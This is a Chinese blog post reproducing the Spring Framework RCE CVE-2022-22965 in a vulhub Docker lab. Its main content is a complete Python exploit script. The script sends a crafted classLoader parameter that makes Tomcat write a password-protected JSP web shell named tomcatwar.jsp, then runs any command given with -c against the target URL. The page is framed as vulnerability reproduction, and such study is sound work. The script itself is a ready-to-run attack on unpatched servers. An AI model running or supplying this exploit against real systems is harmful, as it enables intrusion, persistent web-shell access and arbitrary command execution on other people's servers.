CVE-2022-22965复现

最新推荐文章于 2024-06-17 13:37:33 发布
最新推荐文章于 2024-06-17 13:37:33 发布
阅读量388 收藏 1
点赞数
分类专栏: web安全 文章标签: java spring 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/125224741
版权

CVE-2022-22965复现

简介:

在jdk 9+上运行的Spring MVC或Spring WebFlux application可能会导致RCE

复现环境:

docker run -d -p 8080:8080 vulhub/spring-webmvc:5.3.17

服务启动后,访问http://your-ip:8080/?name=xxx&age=xxx
即可看到一个演示页面。

https://s2.loli.net/2022/06/10/iar1jWfebYPdAxo.png

poc:

使用方法:-t 输入目标地址,-c输入执行命令,默认为id

import argparse

import requests

headers = {
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Connection': 'close',
           'Accept': '*/*',
           'Accept-Language': 'en',
           'suffix': '%>//',
           'c1': 'Runtime',
           'c2': '<%',
           'DNT': '1',
           'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}

headers_res = {
           'Accept-Encoding': 'gzip, deflate',
           'Connection': 'close',
           'Accept': '*/*',
           'Accept-Language': 'en',
           'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t',"--target",help='input target',required=True,type=str)
    parser.add_argument('-c',"--command",help='input poc command',type=str,default='id')

    args = parser.parse_args()
    url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    cmd_url = args.target + "/tomcatwar.jsp?pwd=j&cmd=" + args.command
    refresh_url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern="

    res = requests.get(url=url, headers=headers)
    try:
        if res.status_code == 200:
            res_cmd = requests.get(url=cmd_url, headers=headers)
            print(res_cmd.text.replace("\x00",""))
            ref_cmd = requests.get(url=refresh_url,headers=headers_res)
        else:
            print('Vulnerability does not exist')
    except Exception as e:
        print(e)
lionwerson
关注
专栏目录
Fastjson代码执行漏洞 [CVE-2022-25845].md
07-09
Fastjson代码执行漏洞 [CVE-2022-25845]
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3929
CVE-2022-22965 Spring远程代码执行漏洞复现
Fastjson漏洞之CVE-2022-25845
最新发布
GalaxySpaceX的博客
06-17 1126
Fastjson漏洞之CVE-2022-25845
CVE-2021-3156 漏洞复现笔记
热门推荐
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5612
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3167
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
中间件安全-CVE漏洞复现-Docker+Websphere+Jetty
xiaoheizi的博客
07-15 591
如果拿下的shell是docker容器的,就要进行docker逃逸来获取宿主机shell,因为在docker容器执行命令影响不到宿主机。Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://目标ip:端口/%u002e/WEB-INF/web.xml。信息泄露路径:http://目标ip:端口/%2e/WEB-INF/web.xml。
【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞的复现
Wiofgb的博客
08-12 1776
记录一次CVE-2022-22965 Spring Framework远程代码执行漏洞的复现
CVE-2022-22965 Spring Framework远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-14 3110
springframework 是spring 里面的一个基础开源框架,主要用于javaee的企业开发Spring是什么呢?首先它是一个开源的项目,而且非常活跃;它是一个基于IOC和AOP的构架多层j2ee系统的框架,但它不强迫你必须在每一层中必须使用Spring,因为它模块化的很好,允许你根据自己的需要选择使用它的某一个模块;
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6096
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2022-28525 漏洞复现
2301_78321656的博客
07-10 1516
7.复制路径http://eci-2ze2h1rmp2kibdc8ru3c.cloudeci1.ichunqiu.com/images/3.php连接中国蚁剑读取flag。5.使用burp抓包工具进行抓包修改png后缀为php后缀。ED01-CMS v20180505 存在任意文件上传漏洞。4.寻找上传点,对admin账号进行编辑,上传木马。3.通过弱口令:admin/admin登录成功。6.右击图片,打开标签图片查看路径。
CVE-2022-25845 反序列化漏洞分析
把梦想放飞在蓝色的天空里...
09-20 7457
CVE-2022-25845 反序列化漏洞分析
三流安全工程师的渗透测试记录_ u0040 u0074 u0079 u0070 u0065
2401_83621136的博客
04-12 1275
返回为成功,使用abc#123456确实登录成功。然而这并不意味着,无论何时,直接发送重置密码的数据包都能成功的,这里能成功,是因为手机验证码一般都会有个有效时间,大概发送验证码后的十分钟内,直接发送重置密码的包是能重置成功的。十分钟后虽然返回也是成功,但是登录不上。给的修复建议是:1.后端校验验证码是否正确;2.去掉单独校验验证码的数据包,将验证码与修改后的密码在同一数据包中发送给后端,后端校验验证码正确后直接修改密码,不二次发包。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 1558
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值